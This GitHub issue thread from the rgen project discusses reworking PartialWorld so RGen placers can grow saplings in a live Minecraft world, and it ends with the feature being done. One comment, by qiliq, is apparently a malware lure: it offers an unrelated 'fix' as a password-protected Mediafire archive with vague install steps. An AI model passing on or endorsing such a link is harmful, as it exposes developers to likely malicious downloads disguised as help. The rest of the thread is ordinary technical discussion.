### ISSUE TITLE
RGen placers for saplings

### ISSUE THREAD

**Issue by macmv** [macmv/rgen#26]
Currently, saplings are grown and built in java source, and we need a way to run an RGen placer over a live minecraft world.

I'm pretty sure we can just rework `PartialWorld` to have an enum backend, so that it can either write to a byte array for blocks, or call out to JNI for placing blocks instead. I don't think a whole lot more thought is needed, just a bit of reworking in the backend.

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JaimieGR** [comment]
Sorry, could this be explained a bit more? I'm lost.

**Comment by macmv** [comment]
`PartialWorld` stores a `Map<ChunkPos, Chunk>`, right? and then the set/get block functions just write to that map. So, we can just replace that map with a dynamic thing, that'll call out to java when we want it to. I've got a patch mostly done, maybe it'll be a little clearer when I post that too.

**Comment by JaimieGR** [comment]
yo we have this done now! 1b672968247a361d8b4d5d8505cf659703e99e94
